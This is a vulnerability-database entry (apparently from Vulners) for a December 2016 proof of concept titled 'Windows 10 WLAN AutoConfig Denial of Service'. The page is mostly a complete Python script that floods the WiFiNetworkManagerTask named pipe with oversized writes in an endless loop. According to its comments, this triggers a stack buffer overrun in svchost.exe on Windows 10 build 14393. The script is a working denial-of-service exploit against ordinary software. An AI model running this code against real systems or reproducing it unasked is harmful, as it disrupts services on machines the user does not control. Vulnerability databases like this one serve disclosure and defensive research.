DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:33", "references": [], "description": "\nMicrosoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)", "edition": 1, "reporter": "Jeremy Brown", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2016-12-06T00:00:00", "title": "Microsoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-12-06T00:00:00", "id": "EXPLOITPACK:D3257B50368F5E084D342AEE688ED683", "href": "", "viewCount": 3, "sourceData": "#!/usr/bin/python\n# wlanautoconfig-poc.py\n#\n# Windows WLAN AutoConfig Named Pipe POC\n#\n# Jeremy Brown [jbrown3264/gmail]\n# Dec 2016\n#\n# >\twifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)\n#\tAsyncPipe::ReadCompletedCallback(void)\n#\tAsyncPipe::Dispatch(int,void *,void *, ...)\n#\tSynchronizer::EnqueueEvent(...)\n#\tAsyncPipe::ReadCompletedStatic(...)\n#\n# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe\n#\n# Tested:\n#\n# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)\n# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)\n#\n# Dependencies:\n#\n# pip install pypiwin32\n#\n# Notes:\n#\n# This won't kill Wlansvc service, but the thread servicing the pipe will terminate\n#\n\nimport win32file\nimport pywintypes\nimport msvcrt\n\nBUF_SIZE = 4096\nPIPE_NAME = r'\\\\.\\pipe\\WiFiNetworkManagerTask'\n\ndef main():\n try:\n handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)\n except Exception:\n print(\"Error: CreateFile() failed\\n\")\n return\n\n fd = msvcrt.open_osfhandle(handle, 0)\n\n if(fd < 0):\n print(\"Error: open_osfhandle() failed\\n\")\n return\n\n buf = bytearray(b'\\x42' * BUF_SIZE)\n\n # exact number here could vary, keeping it simple\n while True:\n win32file.WriteFile(handle, buf)\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645836818}}

{}